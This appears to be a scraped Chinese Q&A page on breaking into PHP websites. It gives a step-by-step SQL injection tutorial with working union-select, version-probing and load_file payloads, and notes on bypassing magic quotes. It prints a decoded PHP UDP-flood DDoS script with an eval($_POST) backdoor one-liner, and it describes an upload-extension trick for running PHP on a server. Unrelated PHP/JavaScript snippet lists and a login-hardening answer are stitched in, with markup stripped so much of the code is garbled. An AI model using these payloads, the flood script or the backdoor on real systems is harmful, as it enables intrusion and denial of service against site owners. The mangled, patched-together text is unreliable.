知道php网站后台怎么入侵服务器
你得去找到他网站的源码,如果不是开源网站,那么从代码破解很难,扫他的服务器端口,然后用端口漏洞入侵
如何入侵php网站
很多方法啊,比如:
直接上0day,慢慢渗透,直接去问站长要服务器链接信息~
求高手回答 PHP网站怎么侵入??怎么找后台??
第一讲:判断有没注射点
这个很简单,我们最常用的就是看到页面的格式为:index.php?id=2这样的地址,我们知道PHP经常是和MYSQL数据库一起用的,在MYSQL数据库中一定存在一个表,比如setting_table,我们提交上面地址的时候,程序一般上这样处理的:
1、用GET或者POST取我们提交的id=1把这个值传给一个变量id.
2、查询:select * from setting_table where id =$id
上面的语句就是查询的语句,我们代入$id=1就是:
select * from setting_table where id=1
这话是没什么问题的,会取出id为1的信息进行显示给我们,所以我们就能看到正常的页面。 --------------
看我们是怎么判断的:
1、我们提交id=1 and 1=1
看看这个是什么效果,这里的$id就是1 and 1=1,我们看看是什么样子的:
select * from setting_table where id =1 and 1=1
这个语句加了一个and 语句,后面是1=1是肯定成立的,所以就不影响上面语句的成立,它还会取出id=1的信息进行显示给我们,所以我们看到的还是原来的正常页面。
2、我们提交 id =1 and 1=2
看看这个是什么效果,这里的$id就是 1 and 1=2,我们看看在SQL中怎么执行
select * from setting_table where id =1 and 1=2
分析下这个语句,前面还是一样的,只是最后加了个and 1=2,这个自然不成立啦!又因为是and连接的,so自然找不到符合条件的啦!只能回显给我们一个错误或者空白的页面拉~!!
上面就是一般我们采用and 1=1 and 1=2来判断的基本原来,但是这里还要注意几点,如下:
1、程序处理的时候必须是where id =$id 而不是where id=$id,这个单引号是很不一样的,怎么不一样,以后再说。。
2、程序对我们提交的参数没有处理或者处理的不好,导致我们可以直接提交,如果程序多我们提交的参数进行处理,又会不一样,也是后话!
第二讲:快速判断MYSQL版本
前提:你得到一个注射点,比如:news.php?id=1
这个点是你找到的,提交and 1=1 和and 1=2返回的是不同的。
我们就可以这样来猜MYSQL的版本了。。步骤如下:
1、提交/news.php?id=1/*!40000%20s*/ 如果返回正常就说明MYSQL版本在4000版本以下,你可以依次调节最高位的数字,比如我改为39000提交,如果再正常,就提交38000....直到返回错误提示,最后固定的那个就是MYSQL的版本了。。
下面是我提交测试时的过程(只写MYSQL版本)
40000(+)--39000(+)--38000(+)--370000(-)--37900(+)--37800(+)--37700(-)--结束!!
得到MYSQL版本是37700。
2、一般我们不去猜具体的版本,我们只关系MYSQL是不是在4.0以上,以为只有4.0以上的MYSQL才支持UNION查询,以下是不支持的,所以我们经常只用/*!40000%20s*/ 看看是不是4.0以上的版本。
PS:/*!40000%20s*/ 这里的/*!......*/是mysql里一种特殊的注释方式,也没什么好奇怪的,记得怎么用就可以了~~
第三讲:PHP注射怎样得到表名。。
正准备写,看到有人问到了,就总结下,算第三讲吧! Quote:
Originally posted by spirit at 2006-5-16 05:57 PM:
看了好多 文章了 ....眼睛都花了
里面涉及到的东西也比较全面
不过 一直不知道怎么搞出 表
总不能直接搞 去 字段吧..??
一个一个来啊
数据库 表 字段 值...
这个逻辑我认为是对的 ....
对了这里还是 感 ...
表确实不好搞,不像ASP可能直接暴出来,PHP到现在还是暴不出来的,我们一般有两个办法:
1、靠经验猜:比如大家常用的admin,user,news,vote,wenzhang,guanliyuan等等,没办法的事。。
2、暴代码查看:用Load_file暴出文件代码,就可以看到数据插值到什么表,什么字段了,这样就很明白了,但是load_file也很有技巧的。。以后再讲。。
--------------------------------------------
具体说一下吧:
1、这个没什么好说的,直接猜就可以了,比如你看到一个注射点,类似news.php?id=1这样的点,你用union查询得到具体的字段,比如这样:news.php?id=1 and 1=2 union select 1,2,3,4 是成立的,
你就可以这样猜:news.php?id=1 and 1=2 union select 1,2,3,4 from admin/*如果存在admin表,就会返回真,否则就不存在表admin,其他和这个一样的。
2、这个就有点终极了,比如你得到他的绝对路径,可以load_file(file path)出文件的代码,比如你暴得管理员登陆的页面,就能看到他其中的SQL语句,可以看到他是从哪个表了取的值了,是吧》》
原理就是这样的,多多思考,有什么心得,希望能分享。。。。
第四讲:有无引号的差别
很多朋友都对那个引号的作用不很了解,认为加引号和不加是一样的效果..
引号(包括单、双)对我们的注射是有着很大的影响的,这里主要还是和magic的状态有关,当这个magic为off的时候倒没什么影响,当这个magic为on的时候就大不一样了。。
小知识:magic为on时,为自动为我们提交的单引号(‘),双引号(“),(\),空格( )等加上转意 符号\,使得上的都变成(\’),(\”),(\\)等,这就给我们注射太来麻烦,例子如下。
一、第一个例子(没引号)
如果语句如下:
QUOTE:
select * from news where newsid=$id
1、magic为off时情况
为off时不会处理我们提交的数据信息,假设一个SQL语句是这样的;
我们在URL中可以提交$id的值,就像我们前面说的给$id为:
$id=1 union select 1,2,3,4 from admin
就基本上可以取得我们想要的数据了。
2、magic为on时情况
这时没什么区别,因为我们没有提交敏感的字符
二、第二个例子看它处理的SQL语句:
QUOTE:
select * from news where newsid=$id
这时要想成功利用$id这个没过滤的参数,我们可以提交如下:
$id=1’ union select 1,2,3,4 from admin/*
开始要有一个()来闭合前面的,后面再加一个/*注释掉后面的
1、magic为off时情况
如果magic为off,我们可以直接提交,成功利用
2、magic为on时情况
如果magic为on,那么我们提交的语句变成:
$id=1\’ union select 1,2,3,4 from admin/*
看,就没办法利用了(尽管有漏洞)
被phpddos攻击的原因是什么,一般问题出在那里
您这服务器是被黑客入侵了,被黑的因素 一般都是程序留了后门或vps内被留了系统内核级别的木马 或网站的代码留了隐蔽性的木马或一句话shell
一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了
服务器被黑是每个网站管理员最头痛的问题 也可以通过安全公司来解决,国内也就Sinesafe和绿盟等安全公司 比较专业.
asp网站被人入侵,留了这样一个php加密代码文件,求解决
首先说下1楼的,你不经大脑就回答,简直就是占地方
楼主,我帮你解密出来了:
??php
$packets = 0;
$ip = $_GET['ip'];
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "Flooded: $ip on port $rand brbr";
$max_time = $time+$exec_time;
for($i=0;$i65535;$i++){
$out .= "X";
}
while(1){
$packets++;
if(time() $max_time){
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?
?php eval($_POST[ddos])?
?
解密过程:
decode.php
?php
ob_start();
echo (gzinflate(base64_decode('加密内容')));
$file = ob_get_clean();
file_put_contents("a.txt",$file);
?
1、第一次运行,会在decode.php同目录下生成一个a.txt,里面的内容就是解密出来的(但不一定是最终结果)
2、当a.txt里的代码还不是最初密文的源码时,再次把a.txt里的“加密内容”拷到decode.php替换掉原来的加密内容
循环1、2两步,直到a.txt解密出源码,显示的代码是php代码,如上
源码验证是否正确,只要你看得懂没解密前运行时网页上显示错误的信息,即可对比真实与否
求PHP常用代码大全
if ($da="") { echo "SCRIPT language=JavaScriptalert('问题答案不能为空');"; echo"this.location.href='vbscript:history.back()';/SCRIPT"; } if ($qq!="") { if (!is_numeric($qq)) { echo "SCRIPT language=JavaScriptalert('QQ号码必须是数字');"; echo"this.location.href='vbscript:history.back()';/SCRIPT"; } } if ($youbian=="" or strlen($youbian)!=6) { echo "SCRIPT language=JavaScriptalert('请正确输入邮编');"; echo"this.location.href='vbscript:history.back()';/SCRIPT"; } if ($youbian!="") { if (!is_numeric($youbian)) { echo "SCRIPT language=JavaScriptalert('邮编必须是数字');"; echo"this.location.href='vbscript:history.back()';/SCRIPT"; } } if ($dizhi="") { echo "SCRIPT language=JavaScriptalert('住址不能为空');"; echo"this.location.href='vbscript:history.back()';/SCRIPT"; } if ($mail=="") { echo "SCRIPT language=JavaScriptalert('E-mail不能为空!');"; echo "this.location.href='vbscript:history.back()';/SCRIPT"; } if ($textarea=="") { echo "SCRIPT language=JavaScriptalert('个人说明不能为空!');"; echo "this.location.href='vbscript:history.back()';/SCRIPT"; } if ($textarea=="" or strlen(textarea)150) { echo "SCRIPT language=JavaScriptalert('个人说明为150个字符');"; echo"this.location.href='vbscript:history.back()';/SCRIPT"; } 24、对输出的内容进行判断,从而输出其它结果 ?php if ($rs["active"]==1) { echo "font color='#ff0000'激活/font"; }else{ echo "禁用"; } ? 25.字符截取函数 ?=substr("$rs[zixun_biaoti]",0,28 )? 26.男女问题或单选带选择的 input type="radio" name="hy_zhuangtai" value="男" ?php if ($rs["hy_zhungtai"]==="男") { echo "checked";}? 男 input type="radio" name="hy_zhuangtai" value="女" ?php if ($rs["hy_zhuangtai"]==="女") { echo "checked";}? 女 27.单选不带单选框的 ?php if ($rs['hy_zhuangtai']=='锁定'){? a href="Userzt.php?action=yesid=?php echo $rs['hy_id'];?"锁定/a ?php } else{ ?a href="Userzt.php?id=?php echo $rs['hy_id'];?action=no"解锁/a ?php }? 它的save页是 ?php require_once('../../conn.php'); ? ?php $hy_id=$_GET['id']; $action=$_GET['action']; if ($action=='yes'){ $sql="update hybiao set hy_zhuangtai='锁定' where hy_id='$id'"; $query=mysql_query($sql,$connec); echo("script type='text/javascript'location.href='UserManage.php';/script"); } else{ $sql="update hybiao set hy_zhuangtai='正常' where hy_id='$id'"; $query=mysql_query($sql,$connec); echo("script type='text/javascript'location.href='UserManage.php';/script"); } mysql_close(); ? 28.如果文字过长,则将过长的部分变成省略号显示 DIV STYLE="width: 120px; height: 50px; border: 0px solid blue;overflow: hidden; text-overflow:ellipsis" NOBR就是比如有一行文字,很长,表格内一行显示不下./NOBR /DIV 29. 禁止复制,鼠标拖动选取 body ondragstart=window.event.returnValue=false oncontextmenu=window.event.returnValue=false onselectstart=event.returnValue=false 30.大中小 文字的变化 script type="text/javascript" function doZoom(size) {document.getElementById('zoom').style.fontSize=size+'px';} /script span id="zoom"需要指定大小的文字/span a href="javascript:doZoom(16)"大/a a href="javascript:doZoom(14)"中/a a href="javascript:doZoom(12)"小/a 30. 添加到收藏夹和设为首页 a href=# onclick="this.style.behavior='url(#default#homepage)';this.setHomePage(' http://www.makewing.com/lanren/' );"设为首页/a a href="javascript:window.external.AddFavorite(' http://www.makewing.com/lanren/',' 懒人图库')"收藏本站/a 31. 记录并显示网页的最后修改时间 script language=JavaScript document.write("最后更新时间: " + document.lastModified + "") /script 32. 节日倒计时 Script Language="JavaScript" var timedate= new Date("October 1,2002"); var times= "国庆节"; var now = new Date(); var date = timedate.getTime() - now.getTime(); var time = Math.floor(date / (1000 * 60 * 60 * 24)); if (time = 0) document.write( "现在离"+times+"还有: "+time +"天") /Script 33. 打开窗口即最大化 script language="JavaScript" !-- Begin self.moveTo(0,0) self.resizeTo(screen.availWidth,screen.availHeight) // End -- /script 34. 加入背景音乐 bgsound src="mid/windblue[1].mid" loop="-1" 只适用于IE embed src="music.mid" autostart="true" loop="true" hidden="true" 对Netscape ,IE 都适用 35. 滚动 marquee direction=up height=146 onmouseout=start() onmouseover=stop() scrollAmount=2 滚动信息 /marquee 36. 防止点击空链接时,页面往往重置到页首端 代码“javascript:void(null)”代替原来的“#”标记 37. 不能点右键,不用CTRL+A,不能复制作! body oncontextmenu="window.event.returnValue=false" onkeypress="window.event.returnValue=false" onkeydown="window.event.returnValue=false" onkeyup="window.event.returnValue=false" ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false" /body 37. 随机变换背景图象(一个可以刷新心情的特效) Script Language="JavaScript" image = new Array(4); //定义image为图片数量的数组 image [0] = 'tu0.gif' //背景图象的路径 image [1] = 'tu1.gif' image [2] = 'tu2.gif' image [3] = 'tu3.gif' image [4] = 'tu4.gif' number = Math.floor(Math.random() * image.length); document.write("BODY BACKGROUND="+image[number]+""); /Script 38. 划过链接 手型鼠标 style="cursor:hand" 39. 如何关闭层 div id="Layer1"/div a href="#" onClick="Layer1.style.display='none'"关闭层/a 40. a href=javascript:close()[关闭窗口]/a 41. 凹陷文字背景为灰色 div style="width:300px;padding:20px;overflow:hidden;word-wrap:break-word;word-break:break:all; font-size:12px; line-height:18px; background-color:#eeeeee;" font disabled 怎么样,我凹下去了吧?br 你不想试试吗?br a href=" www.lenvo.cn http://www.lenvo.cn/"www.lenvo.cn /div 42. 给表格做链接 table width="100%" onclick="window.open(' http://www.makewing.com/', '_blank')" style="CURSOR:hand" tr td height="100" bgcolor="f4f4f4" /td /tr /table 43. 后退关闭窗口 后退:javascript:history.back(1) 关闭:javascript:window.close(); 44. 如果文字过长,则将过长的部分变成省略号显示 DIV STYLE="width: 120px; height: 50px; border: 0px solid blue;overflow: hidden; text-overflow:ellipsis" NOBR就是比如有一行文字,很长,表格内一行显示不下./NOBR /DIV 45. 禁止复制,鼠标拖动选取 body ondragstart=window.event.returnValue=false oncontextmenu=window.event.returnValue=false onselectstart=event.returnValue=false
如何使用php代码攻击网站?
学校居然还有这样的作业,就是你写好的php文件,在.php文件名后面添加一个任意的后缀名,然后上传上去,然后输入刚刚上传的文件名,就能执行php代码了
php管理员登陆容易被人入侵,悬赏高分请高手解决
修改管理员账户用户名 密码
用加密函数如MD5加密密码
过滤掉sql注入关键字
偶刚学php 要是asp的话就好解决点
$name=trim(_post('name'));
$pwd=trim(_post('pwd'));
if(!empty($name)!empty($pwd)){
if(!get_magic_quotes_gpc()){
$name=addslashes($name);
$pwd=addslashes($pwd);
}
$sql="select * from datas where username='".$name."'";
$rs=$conn-Execute($sql);
if(!$rs-eof){
$rname=$rs-Fields['username']-value;
$rpwd=$rs-Fields['pwd']-value;
if($name==$rname $pwd==$rpwd)
echo 'Welcome!';
else
echo 'What are you doing?';
}else{
echo 'sorry!';
}
$rs-close();
$conn-close();
}
function _get($str){
$val=!empty($_GET[$str])?$_GET[$str]:null;
return $val;
}
function _post($str){
$val=!empty($_POST[$str])?$_POST[$str]:null;
return $val;
}